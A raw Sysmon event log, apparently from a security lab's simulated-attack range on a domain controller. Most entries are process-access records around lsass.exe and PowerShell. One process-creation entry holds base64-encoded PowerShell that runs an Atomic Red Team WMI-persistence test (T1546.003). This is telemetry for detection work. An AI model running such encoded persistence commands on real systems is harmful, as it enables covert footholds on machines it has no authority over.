13:54:40.505{10ACEC4A-853E-5FCF-0B00-000000009101}864100C:\Windows\system32\lsass.exe{10ACEC4A-85A0-5FCF-DA00-000000009101}4116C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\system32\lsasrv.dll+25add|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 11241100x80000000000000004386Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:40.474{10ACEC4A-85A0-5FCF-DA00-000000009101}4116C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\__PSScriptPolicyTest_2hgh2b1f.ril.ps12020-12-08 13:54:40.474 10341000x80000000000000004385Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:40.458{10ACEC4A-8540-5FCF-0C00-000000009101}5961060C:\Windows\system32\svchost.exe{10ACEC4A-85A0-5FCF-DA00-000000009101}4116C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004384Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:40.427{10ACEC4A-859F-5FCF-D300-000000009101}50044516C:\Windows\system32\conhost.exe{10ACEC4A-85A0-5FCF-DA00-000000009101}4116C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004383Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:40.427{10ACEC4A-8540-5FCF-0C00-000000009101}5961060C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004382Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:40.427{10ACEC4A-8540-5FCF-0C00-000000009101}5961060C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004381Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:40.427{10ACEC4A-8540-5FCF-0C00-000000009101}5961060C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004380Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:40.427{10ACEC4A-8540-5FCF-0C00-000000009101}5961060C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004379Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:40.427{10ACEC4A-8540-5FCF-0C00-000000009101}5961060C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004378Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:40.427{10ACEC4A-8540-5FCF-0C00-000000009101}5961060C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004377Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:40.427{10ACEC4A-8540-5FCF-0C00-000000009101}5961060C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004376Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:40.427{10ACEC4A-8540-5FCF-0C00-000000009101}5961060C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004375Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:40.427{10ACEC4A-8540-5FCF-0C00-000000009101}5961060C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004374Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:40.427{10ACEC4A-853E-5FCF-0500-000000009101}644792C:\Windows\system32\csrss.exe{10ACEC4A-85A0-5FCF-DA00-000000009101}4116C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000004373Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:40.427{10ACEC4A-859F-5FCF-D600-000000009101}46244196C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{10ACEC4A-85A0-5FCF-DA00-000000009101}4116C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|UNKNOWN(00007FF8190292C0) 154100x80000000000000004372Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:40.438{10ACEC4A-85A0-5FCF-DA00-000000009101}4116C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe10.0.14393.206 (rs1_release.160915-0644)Windows PowerShellMicrosoft® Windows® Operating SystemMicrosoft CorporationPowerShell.EXE"powershell.exe" -noninteractive -encodedcommand WwBDAG8AbgBzAG8AbABlAF0AOgA6AEkAbgBwAHUAdABFAG4AYwBvAGQAaQBuAGcAIAA9ACAATgBlAHcALQBPAGIAagBlAGMAdAAgAFQAZQB4AHQALgBVAFQARgA4AEUAbgBjAG8AZABpAG4AZwAgACQAZgBhAGwAcwBlADsAIABJAG0AcABvAHIAdAAtAE0AbwBkAHUAbABlACAAIgBDADoAXABBAHQAbwBtAGkAYwBSAGUAZABUAGUAYQBtAFwAaQBuAHYAbwBrAGUALQBhAHQAbwBtAGkAYwByAGUAZAB0AGUAYQBtAFwASQBuAHYAbwBrAGUALQBBAHQAbwBtAGkAYwBSAGUAZABUAGUAYQBtAC4AcABzAGQAMQAiACAALQBGAG8AcgBjAGUACgBJAG4AdgBvAGsAZQAtAEEAdABvAG0AaQBjAFQAZQBzAHQAIAAiAFQAMQA1ADQANgAuADAAMAAzACIAIAAtAEcAZQB0AFAAcgBlAHIAZQBxAHMAC:\Users\Administrator\ATTACKRANGE\Administrator{10ACEC4A-859F-5FCF-CB41-080000000000}0x841cb0HighMD5=097CE5761C89434367598B34FE32893B,SHA256=BA4038FD20E474C047BE8AAD5BFACDB1BFC1DDBE12F803F473B7918D8D819436,IMPHASH=CAEE994F79D85E47C06E5FA9CDEAE453{10ACEC4A-859F-5FCF-D600-000000009101}4624C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -NonInteractive -ExecutionPolicy Unrestricted -EncodedCommand JgBjAGgAYwBwAC4AYwBvAG0AIAA2ADUAMAAwADEAIAA+ACAAJABuAHUAbABsAAoAaQBmACAAKAAkAFAAUwBWAGUAcgBzAGkAbwBuAFQAYQBiAGwAZQAuAFAAUwBWAGUAcgBzAGkAbwBuACAALQBsAHQAIABbAFYAZQByAHMAaQBvAG4AXQAiADMALgAwACIAKQAgAHsACgAnAHsAIgBmAGEAaQBsAGUAZAAiADoAdAByAHUAZQAsACIAbQBzAGcAIgA6ACIAQQBuAHMAaQBiAGwAZQAgAHIAZQBxAHUAaQByAGUAcwAgAFAAbwB3AGUAcgBTAGgAZQBsAGwAIAB2ADMALgAwACAAbwByACAAbgBlAHcAZQByACIAfQAnAAoAZQB4AGkAdAAgADEACgB9AAoAJABlAHgAZQBjAF8AdwByAGEAcABwAGUAcgBfAHMAdAByACAAPQAgACQAaQBuAHAAdQB0ACAAfAAgAE8AdQB0AC0AUwB0AHIAaQBuAGcACgAkAHMAcABsAGkAdABfAHAAYQByAHQAcwAgAD0AIAAkAGUAeABlAGMAXwB3AHIAYQBwAHAAZQByAF8AcwB0AHIALgBTAHAAbABpAHQAKABAACgAIgBgADAAYAAwAGAAMABgADAAIgApACwAIAAyACwAIABbAFMAdAByAGkAbgBnAFMAcABsAGkAdABPAHAAdABpAG8AbgBzAF0AOgA6AFIAZQBtAG8AdgBlAEUAbQBwAHQAeQBFAG4AdAByAGkAZQBzACkACgBJAGYAIAAoAC0AbgBvAHQAIAAkAHMAcABsAGkAdABfAHAAYQByAHQAcwAuAEwAZQBuAGcAdABoACAALQBlAHEAIAAyACkAIAB7ACAAdABoAHIAbwB3ACAAIgBpAG4AdgBhAGwAaQBkACAAcABhAHkAbABvAGEAZAAiACAAfQAKAFMAZQB0AC0AVgBhAHIAaQBhAGIAbABlACAALQBOAGEAbQBlACAAagBzAG8AbgBfAHIAYQB3ACAALQBWAGEAbAB1AGUAIAAkAHMAcABsAGkAdABfAHAAYQByAHQAcwBbADEAXQAKACQAZQB4AGUAYwBfAHcAcgBhAHAAcABlAHIAIAA9ACAAWwBTAGMAcgBpAHAAdABCAGwAbwBjAGsAXQA6ADoAQwByAGUAYQB0AGUAKAAkAHMAcABsAGkAdABfAHAAYQByAHQAcwBbADAAXQApAAoAJgAkAGUAeABlAGMAXwB3AHIAYQBwAHAAZQByAA== 10341000x80000000000000004371Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:40.224{10ACEC4A-853E-5FCF-0B00-000000009101}864100C:\Windows\system32\lsass.exe{10ACEC4A-8541-5FCF-1500-000000009101}1364C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1e0a8|C:\Windows\system32\lsasrv.dll+1d2d1|C:\Windows\system32\lsasrv.dll+1bb00|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004370Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:40.224{10ACEC4A-853E-5FCF-0B00-000000009101}864100C:\Windows\system32\lsass.exe{10ACEC4A-8541-5FCF-1500-000000009101}1364C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1a4e6|C:\Windows\system32\lsasrv.dll+1ba8f|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004369Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:40.224{10ACEC4A-853E-5FCF-0B00-000000009101}864100C:\Windows\system32\lsass.exe{10ACEC4A-8541-5FCF-1500-000000009101}1364C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+1b05d|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 11241100x80000000000000004368Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.localDLL2020-12-08 13:54:40.193{10ACEC4A-85A0-5FCF-D800-000000009101}5044C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeC:\Users\Administrator\AppData\Local\Temp\v0bxnvba.dll2020-12-08 13:54:40.083 10341000x80000000000000004367Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:40.193{10ACEC4A-859F-5FCF-D300-000000009101}50044516C:\Windows\system32\conhost.exe{10ACEC4A-85A0-5FCF-D900-000000009101}1596C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004366Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:40.193{10ACEC4A-8540-5FCF-0C00-000000009101}5961060C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004365Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:40.193{10ACEC4A-8540-5FCF-0C00-000000009101}5961060C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004364Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:40.193{10ACEC4A-8540-5FCF-0C00-000000009101}5961060C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004363Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:40.193{10ACEC4A-8540-5FCF-0C00-000000009101}5961060C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004362Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 